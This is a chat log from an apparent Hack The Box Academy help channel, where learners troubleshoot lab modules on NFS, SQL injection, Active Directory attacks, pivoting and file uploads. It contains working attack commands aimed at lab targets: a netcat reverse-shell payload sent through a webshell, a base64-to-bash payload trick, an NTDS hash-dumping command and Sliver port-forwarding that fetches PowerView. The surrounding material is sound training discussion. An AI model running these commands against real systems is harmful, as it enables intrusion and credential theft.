#modules

i tried

cd target-NFS
ls

no files or directories :(
what do i do ?

• you cannot export a single file you have to mount an NFS folder

i even did 

showmount -e localhost

output comes like
Export list for localhost:
/tar/tar.txt 172.16.61.0/24

what am i doing wrong

how you are mounting the folder, share the command only.

ok i get what your saying i tried even
/tar 172.16.61.0/24(rw,sync,no_subtree_check,no_root_squash)

but still no positive op

mkdir target-NFS
sudo mount -t nfs 172.16.61.128:/tar ./target-NFS -o nolock

this is the command i used for mounting

on which machine you are @strong sorrel

kali

means module

footprinting/NFS

link of module.

https://academy.hackthebox.com/module/112/section/1068

i was able to easily complete the exercise, but in the module they mentioned to try out how NFS permissions and mounting works, to get a hold i tried to do it on myself, but i am not able to mount the file 😦

@brave scroll if your able to mount the file perfectly please do send me the complete right procedure for it, i have aldready wasted 3 days for this :(( i feel so frustrated knowing for a fact that there might be a very tiny misstake an im not getting the right output just because of it, machines want everything PERFECT 😦

Question for non-english speakers. Did you make your notes in english or in your native tongue? I'm wondering which language should I use?

Whatever works best for you

I prefer English as all the terms and interfaces are English

Makes it a bit easier and less prone to errors

In my opinion

I am new I am doing tier 0 is sudo nmap -sV and nmap -p- -sV give the same information

The difference is the -p- scans all ports

While without it scans the 1000 most common ports

Ohh ok thanks

Hello

Hi, welcome. Please read the #rules and follow the instructions in #welcome to gain access to most channels, like #general.

Hello, Can anybody help me with Direct Prompt Injection section in Prompt Injection Attack module?
I put the ssh command and it froze after giving the pw. I was able to then open 127.0.0.1:5000 web portal and go to the first assignment. but when I try to submit my injection query it completely freezes and never shows any response back and I can't even re-open the page.

Need help on command injection skills assessment

Hi

I’ve got a question regarding module 112 within the MySql section … weird question.

Hi. Pass the hash module
"Access the target machine using any pth tool etc' "
I can't use NXC, i get authentication failure
But i can use evil-winrm. Why?

#general

definitely in english. Try to think, write and work in english

command of both would be helpful to answer your question. I have no clue which protocol you are trying to authenticate to with nxc

Hello I am struggling in module Attacking Active Directory and NTDS.dit. I have created a wordlists and performed brute force attack with netexec and found credentials for cjoshnson but when I use the -M ntdsutil it doesn’t capture the ntds file

have you tried multiple tools? If I remember correctly, impacket-secretsdump should also work to get the ntds file (if you have access to user account who has priveleges for that)

you can DM me, maybe I can help

you can dm me as well

It does not work

Impart secret dump works if you have already capture the ntds file

The only two seats that exist in the course is with netexec and with evil-winrm but none of this works in my case

dm me the command line output

and which exact section you are right now, so I can check me notes

and impacket-secretsdump can retrieve hashes from ntds file

password attacks credential manager stuck. dumped credman using mimi but cant find required password

besides that, I had to use --ntds as an option to dump hashes with netexec.
$nxc smb 172.16.5.5 -u< REDACTED> -p <REDACTED> --ntds --user user_to_get_hash_for

In the course it says to use -M ntdsutil though . The —ntds is not mentioned anywhere

WINRM and SMB

One sec

Nevermind

Why did LaZagne work but mimikatz didnt

sometimes tools just don't work.. this is why being comfortable with many methods is beneficial. In my cases, it was almost always my fault and not the tools fault

oh

Did you ever manage to solve (1) ? I ran into the exact same issue. Built the AVD, ran it, searched for the build number under Settings, About. But the build number found there is just not accepted, irrespective of how I format it.

forget it i solved it

Did you ever manage to solve (1) ? I ran into the exact same issue. Built the AVD, ran it, searched for the build number under Settings, About. But the build number found there is just not accepted, irrespective of how I format it.

as u mentioned you already have done the question.

As an italian speaker.... all my notes are in english. IT world, tools, courses, machine and all are in english so...

something like: mkdir target-nfs
sudo mount -t nfs 10.129.27.59:/ ./target-nfs/ -o nolock

anyone working on Attacking WPA/WPA2 Wi-Fi Networks - https://academy.hackthebox.com/module/282/section/3176 ?

That's the first ever thing that I tried but it failed aswell

Hey there, I just finished the Introduction to SQLi module, but I feel like I'm not going far enough in the final SA 🤔 As per the course content, we get a webshell, but I'm unable to upgrade from the webshell to a reverse shell, even though it seems quite easy...
For a reason I am yet to identify, the following request does not come back to my nc listener, would someone know why ?
http://SERVER:PORT/path/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $MY_IP 10000. Same goes for curl, but the same "path" with an id command works flawlessly

Yes but can you help me with the mounting ?
The questions in it were simple and straight forward

weird, i did that module and that's the command i used (looking in my notebook)

Whats the error?

I believe it has something to do with the version

need help with this https://academy.hackthebox.com/module/51/section/1777

after checking the Python version as the exercise says, and getting it, exercise doesn't accept it.

Try a different payload then. not every revshell payload will work. and depending on how youre deliverying it, you may need to URL encode (revshells website has that option when you copy the shell)

Has anyone been able to complete the Malware Classification section of "Applications of AI in Infosec"? I'm following the instructions exactly, but am constantly getting "NameError: name 'load_datasets' is not defined". Feel like I have tried everything.

it says denied access

Slm

👋

I have problems

Hey guys , i need a teammate for an imaginary CTF challenge. Can anyone join with me ? Pls dm me

DM if u want.

Try messing with the version

How to do that

Guys hello. Who has done Pivoting Tunelling and Port Forwarding in Skills Assessment what is the format answer for this question Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

Hi

https://academy.hackthebox.com/module/112/section/1072 Where can i reach this wordlist as a resource Footprinting-wordlist

Can someone explain me why there is a "Done reading? Check out ..." message on the general chat that impedes me to write on?

hii good people i was doing Pass the certificate from password attack i solved the first one "What are the contents of flag.txt on jpinkman's desktop?" then the next question "What are the contents of flag.txt on Administrator's desktop?" idk what to do i looked through the files in and found mimikatz.exe in Documents folder but it wont execute please help me

If anyone has finished the SCCM attacks part in CAPE, please DM me, thanks.

Read and follow #welcome

So I saw your post the other day, but I likely didn't use the intended path to finish that one. I have been planning to go back through it to do it a different way and figured I'd hit you up then. I still haven't gotten around to it, but will try to do it today. Can DM if you'd like.

Is that user able to perform what you are trying to perform?

Anyone please

I'd work this part from that section AD CS NTLM Relay Attack (ESC8)

its cpts module 😂 not CAPE

Sorry i am little dumb can you explain please

Yeah re-read the section, that is literally the first heading with content.

Open that section, where you see that heading, start to read the material and follow along. It explains and demonstrates everything you need to do to perform the Pass the Certificate attack.

yeah mb didnt checked the content after update

It's all good, I def make mistakes, but my second cup of coffee kicked in and I am a bit more aware.

Ay ay 🫡 so i just repeat the same relay attack for administrator. Ill read it again and try to follow just got lost here thankyou for your help

Yeah it all depends on what .pfx you received from the previous one. If it was for that other user and that user doesn't have privs to get the answer to the second question, then yes I would work it again.

Active Directory Enumeration & Attacks module ACL Enumeration Section
is it normal to wait more than 10 minutes for powerview to enumerate ACLs?

Is the ccache actually located in the /tmp directory or is yours in the current working directory? Hey since your screenshot spoils content over Tier0 I'm going to delete it.

I don't recall how long that took to run, but yes it generally takes a bit of time.

it does i exported it too

It's doing a massive query and is filtering every single one of them so: Yes it's gonna take a while

You can DM.

It just meant I did the right thing bloodhound and finish XD

This is also part of the reason bloodhound takes so long, cos it essentially queries the same thing

nah sharphound took less than 5 minute to gather all the data, while powerview is still running and no output 20+ minutes

what does this mean? don't really understand

Use what you were taught in the section to find the name of the target

You could probably speed things up if you assign the return value from Convert-NameToSid to a variable. You current code calls that function for each object returned by Get-DomainObjectACL and there are a lot of objects 😉

https://academy.hackthebox.com/module/112/section/1072 when i'm using smtp-user-enum with resource wordlist i have output that there aren't any results but when i'm using -T option i have output that it can't open username file. What should i do ?

Remember that mail servers sometimes respond a little more slowly.

Is it normal that on this module https://academy.hackthebox.com/module/27/section/439 it is asked to do a zone transfer but the zone transfer doesn't work ?

no, it should work

like with a dig axfr <domain> @<target_ip> right ?

I have reset the box multipe times

yes, just make sure that the correct TLD is used. The example uses .com

But the question uses .htb

that was the point 😉 if it still does not work you can DM me the output

Hi, I'm stuck on Question 4 of the “Using crackmapexec” module.
The hint says, “Sysadmins save their credentials securely,” but I've searched everywhere and can't find anything.
I found a keepass file, but I don't think it's related. Is that correct?

Without looking at my notes now. If the hint says that administrators keep their passwords safe and you find a password safe, then there should be a connection.

Doubling back just in case someone else has an idea, I just finished the Introduction to SQLi module, but I feel like I'm not going far enough in the final SA 🤔 As per the course content, we get a webshell, but I'm unable to upgrade from the webshell to a reverse shell, even though it seems quite easy...
For a reason I am yet to identify, the following request does not come back to my nc listener, would someone know why ?
http://SERVER:PORT/path/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $MY_IP 10000. Same goes for curl, but the same "path" with an id command works flawlessly I also tried different payloads & URL encoding it

It could be that the webserver has problems with some special chars in the payload. One trick to avoid this is to base64 encode your payload and then running /shell.php?cmd=echo <your_b64_string> | base64 -d | bash and remember to url encode everything.

I'm gonna try that thanks ! I also tried to upload the revshell code on a file but no more success there when accessing it

I checked the LSA, but couldn't find anything that could be cracked. I need some hints.

Which section are you in?

Well that didn't work either, but I'll be sure to keep it in mind for the future, thanks anyway!

I'm wondering if the fact that the box is only a specific SERVER:PORT is blocking off egress traffic from any other port 🤔

Using CrackMapExec - Skills Assessment Question 4

The module shows you a technique where you don't have to crack the file, but still get the data.

Just to confirm something, the ip isnt something like 10.10.*.* for you too right?

Hm, my IP is 10.10.*.*, the box IP is not. It's 94.237.61.242:33762 (or something like that, changes a bit every time)

When a module gives you an IP like that, it's a public docker container. You can focus only on that port and can ignore the rest.

So that would be the reason why I can't get a revshell from it ?

But my webshell passes through because it's running through the same port ?

No, that's probably a network issue. I don't recall any public docker container section in a module where you're supposed to establish a revshell, so you're probably not doing something right. Which module/section is this in?

NM I see, the SQL injection fundamentals module. Yeah I don't think you're meant to get a revshell, there may be rules in place preventing it. You can just use the webshell as shown in the section. It doesn't show setting up a revshell.

You'd need to setup port forwarding on your local network to point it to your machine, and if you're using a VM depending on how you set it up you'd need to route traffic to your VM's subnet

not required for the section though

Yes ! I solved it with the webshell, but thought that I was too limited and wanted to go a step further, that's why

Why would I need port forwarding for this situation when I can get revshells from other SA boxes with "just" the VPN up ? Is there a specific network conf for those specific boxes ?

edit : I see you're saying that it is a public docker container, and I can indeed reach it without the VPN. huh.

Yeah because your home network isn't allowing the traffic through so you'd have to setup port forwarding. That's not the case on the VPN, you're directly connected to the private network via the VPN so you don't need to port forward stuff for your public network.

Yep yep got it, I thought I was reaching it through the VPN but it's public indeed, my bad

Many thanks for the explanation

And I understand that a bindshell would fail as well, on behalf of the fact that only one port is open and that it is taken by the webservice, therefore we wouldn't be able to 1) start a socket on the server on the accessible port 2) reach the socket if somehow we managed to get one open on another port

Let me redo that @cloud urchin

@meager shadow please take care not to reveal attack paths for skill assessments

gotchu

Is there anyone who could help with the Server Side attack skills assessment - Edit: Disregard got it 🙂

@polar sentinel No. Read the #rules.

lmaoo

lmao. there's a whole platform dedicated to learning.

edit: this deleted comment was nuts

Anyone done the advanced deserialization: XML part? unsure as to why I'm getting this error:

+        $exception    {System.InvalidCastException: Unable to cast object of type 'System.Data.Services.Internal.ExpandedWrapper`2[System.Windows.Markup.XamlReader,System.Windows.Data.ObjectDataProvider]' to type 'TeeTrove.Models.Tee'.
   at TeeTrove.Controllers.TeesController.Import() in C:\Users\bill\Desktop\Advanced-Deserialization-Attacks\TeeTrove\Controllers\TeesController.cs:line 91}    System.InvalidCastException

The payload works in console app and all I've done is remove escapes and add the Tee tag.

The course is telling me that this is how its done, but its resulting in an error?

Hi, I made a pause in my CPTS
I'm at the Windows built in group module

https://academy.hackthebox.com/module/67/section/601

I have the NT hash and password of the Administrator but I don't successfully connect (either RDP, SMB, or mimikatz) I feel stupid.

you can dm me

In Advanced XSS and CSRF EXPLOITATION module, CSRF section it is given that Samesite cookies won't be sent in cross origin requests but it is wrong it should be cross site instead. Big difference

Do you think this is correct?

it is me or the lab TE.CL is illogic as fuck? i just resolved it and it seems a simulated http request smuggling because you let the update CL or put any CL it will resolve the lab (if you do the right thing to have CL taken)

you are right!!!

Hi guys, i hva some questions about XEE on file uploads attacks. When i upload a svg file. How the web server execute that file?? If my svg file execute file:///flag.txt

How the server execute that?

THX

Btw, i asked chat gpt but i cn barely understand it

File:// is just a method, if you ever open a file in a web browser you'll often see file:///path/to/file

.

Hi

Hi welcome, please read the #rules and follow the instructions in #welcome. This channel is for discussion of the modules on HTB, better to say hi in #general.

Hello , I am stuck on Window Credentials . Could someone help me to figure it out ?

Hi

My probelem is What password does Bob use to connect to the Switches via SSH ( Case-Sensititive). I tried to pivoting but not successful for ssh

I don't know if it is your case, but with sudo mount -t nfs [...] I was able to mount the share but unable to access its files (there was a TechSupport folder). Then I tried sudo su (so change user as Root) and again mount -t [...] and it worked. Dunno why

you used window rdp machine sudo su . not clear

C:/users/bob has .ssh file

but no access . I tried powershell but failed to read the content

Thx

Hi everyone!! Can someone help me with a quick help on the module File Upload Attack, beens stuck in one questions for two weeks now

Also re read the module again but still stuck

For the Password Attacks module, I completed the newly added "Attacking Windows Credential Manager" section. I was able to do UAC bypass and use mimikatz.exe to get the plaintext password. However, I decided to do it again today just to solidify my understanding, and it gave me a different password for the user mcharles. And Now I'm confused lol

Is that under File Transfers?

Oh nevermind

Applied everything learned on the Client side to bypass some upload filters. When I open the upload_images/shell.php4 it loads the page blank. Which means is not executing the file. When fuzzing the extensions I get q length of 225-230 responses which does not match the 193 on the exercises. I did not pay attention to this since the exercise get updated.

Under the Bug Bounty Cert

That's on the CPTS path too, I wish I could help you, but I'm about 5 modules away from that lol

I have strong grit which is why I keep looking at this every day, but still cannot pass it

Wait I think I had a similar issue on one of the earlier modules, I would maybe swap vpn servers, and look into your shell code and make sure everything is absolutely perfect. I know sometimes the boxes can also be very unstable.

I tried doing a reverse-shell but it did not work also did try to listen using netcat

Is it the skills assessment?

hello

i cant text in the general section why is that?

Is the Blacklisted section

No one can

why?

Sorry but I am not sure

anyways can someone give me some tips on how to get better at cyber security bcs when i practice on hack the box, i cant understand anything i start asking chatgpt and watch yt videos

okay thank you tho!

and i feel like im not learning anything

I notice this section right here "Now, we can try uploading a file using any of the allowed extensions from above, and some of them may allow us to execute PHP code. Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code." Do you think it could be the extension you're using?

Hey man you'll get it in time. What are you struggling with the most right now? I still have issues of my own, but I started not understanding anything either.

You must keep at it day by day other wise you will forget and loose some parts

^This. Eventually you'll brute force your mind into grasping it no matter how slow or quick.

everything i cant understand anything

After a while it all make sense at the beginning it could be overwhelming but as you go you get q better understanding of what you have learn

Well what are you currently trying to work on or study? Like subject in particular are you struggling with?

well im studying cyber security as an skill i always wanted to learn it

Tried a couple
Of different ones also did an asp as well

not for an project

if its that what u mean

Which area of Cybersecurity? Because it's a really broad field. And Youtubers will also trivialize things and make them look really simple, when in reality it takes a long time of practicing to really understand what's going on.

i struggle with everything, with remembering all the codes like root and how to use them

Best tip is to develop you own framework as everyone has different strategies. Start with the Networking foundations this will help you understand how everything is communicating and interacts

I may have to go through this module to fully understand. Sorry man i wish I could be of more help

i really dont know whhich areas there are

alright thank you

root is the superuser. Basically the admin of the linux system. Like how Administrator is admin of a windows system.

should i use linux ?

should i also use try to hack me ?

The reason I am saying this, that is what I did and I am not a software developer but understand the difference in syntax for different languages

You can but majority of companies use Windows

You can download Virtual Box and watch a video on how to download that and download Linux and how to set it up as a virtual machine and you can practice from there. I would just mess around with it and get comfortable with the commands. You'll also want to get comfortable with PowerShell which is on Windows. It's overwhelming, but once it clicks, you'll find it much easier to learn different command lines.

thank you a lot guys!

No problem, just don't give up!

can someone pleas link me that github list of default creds that is in the penterster path i cantseem to find it anywhere :/

do you mean seclists?

https://tenor.com/view/e-gif-9416941808448774474

lol

thsnks again!!!

thanks*

Never give up!! Have grit and if you get stuck get a break then get back to it! Make sure is not a long break other wise you will need to re read to refresh

SecLists or Payloadofallthings

@severe crow

A puerto rican hacker 💀

Can only help the world one grain at a time 🔥

I'm trying to think how much trouble a non-spanish speaking person would have pronouncing "Coqui"

Would they say cawkui

Let's keep this channel on topic!

Are you working on your pentest path?

Hi Rem been trying to get assistance on a section Blacklisted under File Upload Attacks

Mostly on the Bug Bounty Cert Path

Are you unable to bypass it?

Unfortunately not yet, tried reading the treads in the forum but I think the exercise got updated due to the different response length than the example and the forums. I even tried an Asp file and changing the Content-Types I’ve gotten creative but no bypass yet

You can DM what you've been trying.

Sending shortly

@wet arrow Please take care not to spoil content from modules above tier 0

wsup

why cant i chat in general lol

it keeps directing me to modules

Read and follow instructions in #welcome

aight thanks dude

its so hard to do in mobile bro

Can anyone solve this problem ? what password does Bob use to connect to the Switches via SSH(Format:Case-Sensitive)

I am stuck this question solved other problems

Hi, this is covered in the walkthrough, so it's not an exercise answer. I'm just checking—is this for showing a way to do it, or is there a constraint requiring this approach?

It's against the rules to post content from any module above tier 0. Plus, for AEN, some people like to do it completely blind without reading anything from the module or the question themselves and you're spoiling that content.

If you feel the need to post a little more info you can ask to DM someone but please don't post the content

My apologies. Is there a chat where I can ask for this clarifications?

👍

I did pivoting based on winscp ip . looks like it is pivoting ip and port is 22 . I used LaZagne.exe , mimikatz but did not get ssh password

Pivoting is also not working

OK... I'm Officially stuck on how to even begin assessing the 'web application & api -> practical assessment'. I can't get it to respond with the scripts that I've got and it's not responding to any of the curl request that I've formed... Does anyone have any advice?

is there a channe for htb lab? i cant find it

You need to follow instructions in #welcome to gain access to most channels in the server

If someone who knows better than me on http request smuggling can enlight me?! i have the flag but for me it is illogic and i dont fully understand why it worked, for me it is a simulated http request smuggling and that makes the lab totally illogic et unrealistic

I've been stuck on Q4 of the Skill Assessment in the crammapexec module for days. I need some hints.

Review the Popular Modules section, specifically things covered in the SMB protocol part.

hello world,

What are the contents of flag.txt on Administrator's desktop? PASSWORD ATTACK module, Pass the certificate, second question.

I was able to get jpinkmans account via evilwnrm and got my first flag. But how i can get the Administrator's flag?

Please help(

Are “Popular Modules” different from crackmapexec modules?

theres a submodule named 'popular modules' in crackmapexec module

Thank you, I was able to move forward. Why didn't I try this before?

its ok we all get confused sometimes haha

where else i can get help from? GPT is not even close. Google nothing. I think it would be cool if HTB would add some hint int there

never mind, thanks for not answering lol, i got it

it was easy

i am just dumb

i like this thing of HTB, as they are developing our power to think different & out of box.
btw there are hints(step by step) present but they are available only in Annual subscription.

no money no honey i see

🫠

i feel like it is better to do it on my own without hints, since it will make you find a way to solve it.But meanwhile it takes my time((

if it's taking time, there is nothing wrong to take hint instead of direct way.
you can ask for hint whenever u think you are stucked but after trying your best -> as it will develop your methodology.

its not hint its whole solution xD (i have annual silver sub) :P

hehe i forget it.

I was able to complete all the crackmapexec challenges. This may be the first time it took me this long. Thank you.

u done with ad enum and attacks?

Yes, I've already finished.

nice

Cheers! 🙂 Regarding the footprinting-module and the section about "IMAP / POP3" --> I needed to add the command tags in front of any command once logged in. I'm nont sure whether its in the academy-text or not, but I could not find it. I was kind of confused when the commands from the given command list did not work 😄 Is there another way or is it meant to be a bit confusing? 🙂

Need a sanity check on WindowsPrivilegeEscalation SA 1 - All my carbs are being spat out and I'm out of toner

man, this message got some type of encryption. I am not sure if he is asking for help or not

I am, plez send help

you can DM if you want, I still have my notes about the skill assessment 1

dm or post question without spoilers, either way

Hello please help about this question: What is the Type of the service of the "dconf.service"? and when i try this command: "sudo vim /etc/systemd/system/dconf.service" i get nothing

which module and which section and their question?

From Linux Fundamentals> Task Scheduling

seems like you didn't google it, right?

yea I didn't

you don't have to check the file itself. The question is what type of service that the configuration file is for.

Google the question and see what service that is

okay copy that

@cloud urchin Could you please give me permission to DM you ?

Hi

That's illegal, contact instagram support

Someone did hack mine thats why was asking

👍

No one here can help you, contact instagram support

@waxen totem Could you please send me link how to enroll instagram support

https://help.instagram.com/

@waxen totem Thanks

Hi! Could someone help me with https://academy.hackthebox.com/module/147/section/1315?

I'm having an issue with the LSA secrets exercise

After dumping them locally, I got the ||dpapi machinekey and userkey with the secretsdump|| but I don't know how to retrieve creds from that, || hashid -m "machinekeyhash" or hashid -m "userkeyhash" || returns nothing

dpapi.py

but that's not installed on the machine, neither python, can I install it? or for cleanliness I should find a way to do it without installing?

Because I tried the dumping externally and that didn't work

try impacket-dpapi

you use it on your attacker machine

Hello!! im having some problems crawling with finalrecon , i have no connection

Deleted your messages cos it spoils one of the answers for that section, is the subdomain in your /etc/hosts file?

yes

sorry

are you using this format:

<IP>(NO PORT) host subdomain

yes

DM me

@waxen totem can I DM you too? I'm still lost as this is not explained on the module properly

sure

Can anyone provide some help for the LLM output attack skill assesment is been 3 days am still stuck on it

Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

Can someone help me out? I checked for what extensions can be uploaded, changed the contents and tried to execute the file and i never got my flag just the output of what's inside the file

If the file is displaying then it's not executing, which means it's probably the wrong extension

That's the thing, it says all the extensions are allowed but some arent allowed

I cant sit and test all 45 manually that's way too much, I don't know why fuzzing isn't working as it's supposed to be

What tool are you using to fuzz maybe?

burpsuite

their built in fuzzer

Burp intruder is inherently slow, have you tried FFUF with a request.txt file or OWASP ZAPproxy ?

I have not used ffuf for it

but burpsuite should work just fine for fuzzing extensions for file upload

no clue, I didn't use it. Also looks like a lot of your extensions aren't php extensions

what did u use?

zaproxy

i'll try it

Yeah i dont know tbh what im doing wrong

Hi all, i was wondering if I can ask a question about the dynamic port forwarding with ssh and socks tunneling module here? I would like to post an image and get some clarification

To be able to post pictures, you must verify your account
Read and follow #welcome

thank you friend, I just did that

am I okay to ask the question and post the image here now?

yes this chanel is for that only : )

perfect, I has a question relating to this image. There is accompanying text: " Let's take an example of the below image where we have a NAT'd network of 172.16.5.0/23, which we cannot access directly." I had questions regarding the NAT aspect of this statement. What does it mean in this context?

• does it mean that the IP that I see in the image 172.16.5.129 is a translated IP itself?
• or does it mean that ip 172.16.5.129 is the "public" ip of the NAT network and is performing translations for all machines behind it?

Module: Pivoting, Tunneling, and Port Forwarding
Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling

NAT is Network translation address which will convert pvt. ip to public ip for forwarding requests

our public is diff and private ip is diff coz of NAT

Yes I understand that, but I don't understand how that applies in this context. How does my tunneling and enumeration approach change given that 172.16.x.x is within a NAT'd network?

Since the victim server is already compromised, and that server has an interface to the 172.16.x.x. address, can't I access all machines in that network as usual?

no

Hi everyone

you can access compromised machines directly (in same network) to access 172.16.x.x machines you have to do pivot to access that network

hi #welcome follow steps mentioned here

yep that makes sense, but how does NAT come in here? why is that even a consideration?

anyone can help on the windows lateral movement skills assessment? just need a little nudge, stuck on the VNC part

NAT doesnt come in here i explained coz u used NAT so i first thought u might be confused about what NAT does coz both networks are totally different but connected to each other

The module text says this about that image:
Let's take an example of the below image where we have a NAT'd network of 172.16.5.0/23, which we cannot access directly.
Are you saying that the fact that 172.16.5.x is a NAT'd network is irrelevant?

oh ok NAT does come in here coz the internal ip of the host might be different but its connected to a external network so its using NAT

yeah that's what i was wondering, that IP that is shown to me in the image 172.16.5.129 - is that a translated IP that this host has been given, or is the text saying that there is a private network, and 172.16.5.129 is the gateway ip into that network?

its translated IP for the host

perfect, thank you so much 🙂

no problem, even i spent two weeks on pivoting (concept only) got way too confused 😂

Hey, could anyone give me some hint with the password attacks module assessment? I got to DMZ01, I had scan rest of the hosts with nmap, tried to brute force SMB on FILE but can't make it work, not sure if it is possible.

try enumerating files

is it normal that SharpWSUS.exe not working on the SUPPORT host? like only the locate command works, running it as a rossy user

or do I have to run it on WSUS host? but there is no such user as rossy there, but I guess I can create in rossy context the new process, oh my dayz, its disgusting

Yeah you are going to want to run that on a host that supports it, which would likely be named WSUS.

So I must run it in Rossy context, right?

Hello did you find a solution?

There might be a reason to.

Hello did you find a solution. Im also stuck in this question. I tried it a few times but i cant find my mistake.

Yes, there is one compelling reason to run it under her context

Did you find a solution? Im also stuckt at this Point...

But I cannot solve yet how can I run it, I am having trouble to get the process running as rossy

Hi, im Stuckt in the Androit Fundamentals Module.
I Followd the instruction but my Answer ist wrong.
Do you have any Ideas?

Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

I Solved it...

Ohh, thanks I did it before but missed useful info

np

Did anyone solve window credentials module in Password attack . I have been stuck for two week

If you are on the correct host, as the correct user, and SharpWSUS.exe isn't working try the powershell version.

yes whats your quest?

The user is not correct

Did you solve "What Bob uses password to switch via SSH ?" I did pivotiing , mimikatz but nothing is worked

Have you tried moving laterally with that user? If it's easier to explain things you can DM, as to not spoil content.

@wooden seal Did you solve SSH...

yes wait telling

@wooden seal Please DM me

@lucid grailcan you name the sub module?

Credential Hunting in Windows

@wooden seal Credential Hunting in Windows

why thats problem ?

windows?

theres a file try looking for it

np, its in Attacking Authentication Mechanisms module specifically SAML Lab Setup

Hi, I am a complete beginner in cybersecurity and just started doing my first path of cracking into HTB, and in the module of Getting Started, I am stuck on the exercise in public exploits which is: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start). So i ran msfconsole, and search exploit eternalblue and ran the exploit but it didn't work. I am confused on how to approach this.

Try visiting the ip

anyone here ???

Hi I have a question on Modul "Pivoting, Tunneling, and Port Forwarding" "Port Forwarding with Windows Netsh", I set the portforwarding with netsh, with Remmina it works but xfreerdp fails, can I only use xfreerdp with one window?

Xfreerdp works with multiple windows

Ok why doesn't it work? Remmina works... isn't it the same connection?

no idea why its not working, im assuming you did the proxychains/whatever ¯_(ツ)_/¯

Can I dm you? I don't want to spoiler commands

Sorry dms arent open atm

Ok can I show you the commands here?

Do I need to configure proxychains if i use portproxy?

I will try to reboot the machines 🙂

@wooden seal Did you find any solutions for Window Credentials in Password Attack module ?

@wooden seal I have been stuck for almost three week

@lucid grail ^

i told u a hint

it should help u @lucid grail

@wooden seal Please give me hint . That is also helpful

@wooden seal you are talking about cheatsheet

theres a file on system search it

Password Attacks module credential hunting in network shares. I'm stuck cant find creds of other user, too much data

Maybe using a pattern is useful

guys hello I can't run ptunnel-ng tried all means to install it but nothing worked even chmod

I did , not much to do from there

When I did nmap I found a port to login page

But in the source code

There was no test login available

Well, you can always look up what's shown there in vulnerability databases...

Where's the vulnerability database?

Google, searchsploit, msfconsole

Intro to C2 Operations with Sliver In the Kerberos Delegation & Enumeration using rportfwd this doesn't work -
Assume that we set up a file server on port 8080 on our attack machine, and the target cannot reach this port. However, it can reach port 8080 on WEB01; we can create a reverse port forwarding on WEB01 to relay the traffic between SRV01 and our attack machine. To circumvent those types of restrictions, we will utilize the reverse port forwarding (rportfwd) functionality in Sliver. Execute the following command in the session of WEB01:
Kerberos Delegation & Enumeration

sliver (http-beacon) > rportfwd add -b 8080 -r 127.0.0.1:8080

[*] Reverse port forwarding 127.0.0.1:8080 <- :8080

This only loops traffic to local host from web01 to itself.

You need to add the following to make it work in that section:

On the Web01 session

sliver (http_beacon) > rportfwd add -b 8080 -r 10.10.14.189:8080

[*] Reverse port forwarding 10.10.14.x:8080 <- :8080

sliver (http_beacon) > rportfwd 

 ID   Remote Address      Bind Address 
==== =================== ==============
  3   10.10.14.x:8080   :8080        

Then on the srv1 pivot:

rportfwd add -b 8080 -r 127.0.0.1:8080

then on the srv01 pivot session

sharpsh -- '-u http://127.0.0.1:8080/PowerView.ps1 -e -c R2V0LU5ldENvbXB1dGVyIC1VbmNvbnN0cmFpbmVkCg=='

#1234357888114364508 if youre suggesting a fix

thank you @fathom pendant

which tool should i use

I used nxc if I recall correctly, it wasn't much just using the newly found creds to search around

Using patterns like "pass" or "passw"

ok

also, any idea why nxc doesnt work but netexec works fine

Those should be the same thing 😅

Something borked in the environment

hey guys, i really really need a nudge

anyone around?

hello?

you didn't even say which module/section/question you're on

sorry

I was just waiting for a reply...

@indigo roost I finally got time to test your suggestion for using RDP through SSH but unfortunately it did not work gave me the error:"Please check that the $DISPLAY environment variable is properly set."

Credential Hunting in Network Shares - As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

been stuck on this for hours

chasing my tail

There were just some hints mentioned. Scroll up a bit.

Try finding the domain (i.e. INLANEFREIGHT) and go from there

Anyone able to give a second opinion on what I may be doing wrong. I’m working with using chisel and trying to pivot to another machine using Xfreerdp basically my first target is a 10.129…… second target is a 172.16……. The 10. Has a network adapter that does Include a matching subnet to the 172. I did confirm my second target machine is listening on 3389 but I don’t seem to be able to get into the computer. I did confirm the windows 1st target is able to communicate with my attack client.

I’m wanting to believe that the user/pass I was able to recover does not have remote features, I need to confirm but I feel like the module I’m working on, the user is the only available one to get within.

Module: File Transfer Methods, Section SMB Downloads.

Why do I need to spin up an SMB server for downloading files from a share? Can't I just log into an SMB server via smbclient and just use the get/mget command and download the file?
Is it more evasive to mount a share and then copy it?

Sitrep i think you can also just RDP to the kali machine if that isnt working for you.

Im not getting thay error tho, ive seen on a forum that it might come up if u are trying to run xfreerdp as root? I say just reset ur target and if that doesnt work then reset the pwnbox too, assuming ur running this stuff through there

Hii yha koi hindi bolne vala hai kya

yeah unfortunately running as root and resetting has not fixed it maybe the connection is slow or the machines. I am currently RDP'd into Kali and then RDP'd into the windows machine but it takes several seconds for it to register input

sadge, lmk if u need any help with the skills assessment or the questions for that section

Hello everyone

Need help here

So in the SIEM fundementals skill asseseemnt it says connect to http://[Target]:5601

when I spawn the target enter the ip it doesnot work

It says unable to connect

It was working on the previous section but when I reached skill assessment it is not working

needa wait for kibana to spin up i believe (~5 mins from what i remember), unless u already did that then reset the target maybe

Tried to wait for 20 minutes and I am facing this problem since yesterday

tried to change the target several time but nothing is working

can someone help me out, i'm doing the introduction to infosec course in HTB and i'm stuck in the public exploits section,|| i found out about the wordpress 5.6.1 and some themes||, nothing more than that, i also found a lot of possible public vulns, but i still can´t figure it out, what am i missing?
*sorry about the bad english

The plugin is directly on the webpage when you visit it

i feel really dumb right now... but thanks a lot

Any good resources to learn about DLL Injecting/Hijacking and DLL in general. Im on windows privesc module, DLL injection part but i'm not quite understanding it

Hi whenever i need to use metasploit to have an reverse shell i have this error Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi Did you mean? STDIN therefore i use the web vm anyone got this error ?

Which modules should I complete before attempting OUTBOUND ??

.

.

